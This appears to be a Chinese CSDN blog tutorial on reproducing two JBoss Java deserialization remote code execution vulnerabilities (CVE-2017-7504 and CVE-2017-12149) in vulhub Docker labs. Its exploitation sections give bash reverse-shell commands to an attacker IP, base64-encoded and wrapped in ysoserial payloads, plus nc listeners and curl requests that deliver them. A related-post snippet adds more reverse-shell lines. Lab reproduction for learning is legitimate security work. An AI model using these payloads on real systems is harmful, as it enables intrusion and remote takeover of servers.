(五)vulhub专栏:Jboss远程代码执行漏洞复现

已于 2022-07-19 16:09:14 修改
阅读量578 收藏 7
点赞数 1
分类专栏: vulhub漏洞复现 文章标签: bash linux 开发语言
于 2022-07-13 16:32:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014536801/article/details/125767006
版权

Jboss远程代码执行漏洞(CVE-2017-7504)

影响范围

JBoss AS 4.x及之前版本

漏洞成因

JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

漏洞利用

环境准备
名称IP
攻击机192.168.75.162
靶机192.168.75.146

首先输入以下命令进入vulhub里启动靶场,然后在攻击机里访问http://192.168.75.146:8080即可

cd vulhub-master/jboss/CVE-2017-7504
docker-compose up -d

image-20220713161234174

漏洞复现

首先准备好生成payload的工具:ysoserial.jar

然后准备好反弹shell的命令,需要对其进行base64加密

//反弹shell命令,注意替换为自己的
bash -i >& /dev/tcp/192.168.75.162/6666 0>&1
//base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE2Mi82NjY2IDA+JjE=

java  -jar  ysoserial.jar  CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE2Mi82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}" > poc.ser

执行完上述命令会生成一个poc.ser文件,接下来新打开一个cmd窗口执行以下命令:

nc -lvvp 6666

监听启动后再执行下述指令:

curl http://192.168.75.146:8080/jbossmq-httpil/HTTPServerILServlet  --data-binary @poc.ser

可以看到如下图,反弹shell成功,此漏洞利用成功

image-20220719155108963

Jboss远程代码执行漏洞(CVE-2017-12149)

影响范围

漏洞影响5.x和6.x版本的JBOSSAS

漏洞成因

该漏洞为Java反序列化错误类型,存在于jboss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。

漏洞利用

环境准备
名称IP
攻击机192.168.75.162
靶机192.168.75.146

首先输入以下命令进入vulhub里启动靶场,然后在攻击机里访问http://192.168.75.146:8080即可

cd vulhub-master/jboss/CVE-2017-12149
docker-compose up -d

image-20220713161234174

漏洞复现

首先准备好生成payload的工具:ysoserial.jar

然后准备好反弹shell的命令,需要对其进行base64加密

//反弹shell命令,注意替换为自己的
bash -i >& /dev/tcp/192.168.75.162/6666 0>&1
//base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE2Mi82NjY2IDA+JjE=

java  -jar  ysoserial.jar  CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE2Mi82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}" > poc.ser

执行完上述命令会生成一个poc.ser文件,接下来新打开一个cmd窗口执行以下命令:

nc -lvvp 6666

监听启动后再执行下述指令:

curl http://192.168.75.146:8080/invoker/readonly --data-binary @poc.ser

可以看到如下图,反弹shell成功,此漏洞利用成功

image-20220713162425091

云舒_YunShu
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
研究项目:JBoss架构分析
03-04
摘要JBoss是一个免费的开放的J2EE实现。...在这个项目中,我们分析JBoss应用服务器架构的四个特殊部分,JBossEJB容器、JBossNS、JBossTX以及JBossCMP,逆转工程工具能使我们通过源代码来分解组件/子系统。无论
JBoss远程代码调试配置说明
07-03
2. 启动 JBoss:双击 standalone.bat 启动 JBoss。在启动过程中应当在命令提示窗口看到”Listening for transport dt_socket at address:8787”这句话,说明配置成功。 3. 设置 Eclipse 远程 debug:在 Eclipse 中,...
vulhub漏洞复现-jboss反序列化漏洞复现
weixin_45095113的博客
12-21 647
vulhub漏洞复现-jboss反序列化漏洞
Jboss反序列化远程代码执行漏洞(CVE-2017-12149)
weixin_46411728的博客
08-28 1707
Jboss反序列化远程代码执行漏洞(CVE-2017-12149)
命令执行漏洞【2】vulhub远程命令执行漏洞复现
最新发布
LfanBQX的博客
04-26 334
bash -i >& /dev/tcp/10.1.1.101/6666 0>&1 (被控制端未装nc,就可以使用bash(linux都能连接))在linux特有临时目录/tmp下创建空文件,由于通常该目录中不会存在该名称的文件,所以可以作为命令执行的验证命令.被控制端 nc 10.1.1.101 6666 -e /bin/bash。可看到在/tmp/路径下,已成功创建的success文件,说明漏洞利用成功。(1)s2-061漏洞复现。(2)s2-059漏洞复现
vulhub漏洞复现79_Jboss
weixin_44193247的博客
02-16 1614
vulhub漏洞复现练习篇
vulhub-CVE-2018-1273远程命令执行漏洞复现
m0_62008601的博客
09-23 1304
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。看到靶机中已存在shll.elf文件。接着我们就需要开启监听,这时候用nc进行监听的话,收不到反弹的shell。发送命令之后返回500说明执行成功,接着我们登录到doker容器看到success文件成功被创建,说明漏洞存在。执行之后如果没成功反弹shell ,可以先执行赋予文件权限的命令。开启监听之后,再修改请求命令,让靶机执行木马文件上线。
vulhub thinkphp5 5.0.23 远程代码执行漏洞
weixin_53696027的博客
03-15 730
vulhub thinkphp5 5.0.23 远程代码执行漏洞
jboss-security-extended:JBoss 安全扩展
06-08
JBoss 安全扩展在 JBoss/WildFly 容器中通过 JMS 和 WebSocket 端点传播安全上下文。 Maven< dependency> < groupId>...
Apache SSI 远程命令执行漏洞(SSI注入漏洞复现 _ _使用vulhub搭建环境
net的博客
02-19 299
实验环境:Ubuntu。
漏洞介绍及修复建议(漏洞汇总,建议收藏后期会不断更新)
Alone hackers的博客
03-07 7059
漏洞介绍及修复建议(漏洞汇总,建议收藏后期会不断更新)
Jboss反序列化漏洞复现
weixin_53747497的博客
02-24 509
JBoss 在 /invoker/JMXInvokerServlet 请求中读取了用户传入的对象,然后我们 可以利用 Apache Commons Collections 中的 Gadget 执行任意代码。Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中 没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,请求中读取了用户传入的对象,从而导致了漏洞
vulhub-jboss-CVE-2017-12149漏洞复现
m0_62008601的博客
09-18 1383
Jboss是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。Jboss属于redhat公司,而且jboss是开源的,免费的,且在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器,所以曾经广为流行。该漏洞出现在请求中,服务器将用户提交的POST内容进行了Java反序列化:(该图像来源于vulhub官方wp中)
jboss中间件漏洞复现
mingyqf的博客
02-15 1373
参考:https://blog.csdn.net/cj_Allen/article/details/109522771 JBOSS简介 JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于J
vulhub-漏洞复现(Spring Data Rest 远程命令执行漏洞(CVE-2017-8046))
weixin_45095113的博客
12-08 472
vulhub漏洞复现
智能一代云平台(十):Jboss远程访问流程总结
热门推荐
通往精英的成长之路
02-05 1万+
【前言】 最近在做一个EJB相关的项目,在做的过程用到了远程调用的相关东西,自己进行一下梳理和总结,在此与大家分享。 【相关流程】 一、对EJB和Jboss两者梳理: 1、小感:大多数情况下,提到两者中的一者,就会提起另一者;刚开始的时候自己也是对这两个东西比较混淆,最近在项目中用出了些问题,自己查找资料将其梳理一下,原来一些模糊的地方逐渐清晰起来...
JBOSS远程代码执行漏洞
Java web 开发专栏
01-09 842
JBOSS默认配置会有一个后台漏洞漏洞发生在jboss.deployment命名空间中的addURL()函数,该函数可以远程下载一个war压缩包并解压访问http://www.safe3.com.cn:8080/jmx-console/ 后台,如下图下拉找到如下图所示点击flavor=URL,type=DeploymentScanner进入在输入框中写入war压缩
vulhub系列】CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
Wiofgb的博客
08-28 3000
记录一次CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
网络工程原理课程设计抓包Java代码
12-24
本文主要介绍了网络工程原理课程设计抓包Java代码以及实验十一中关于会话Bean的实现,总结了实验的目的、基础知识与原理以及实验的内容和步骤。 网络工程原理课程设计中使用了抓包Java代码,通过该代码可以抓取网络...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值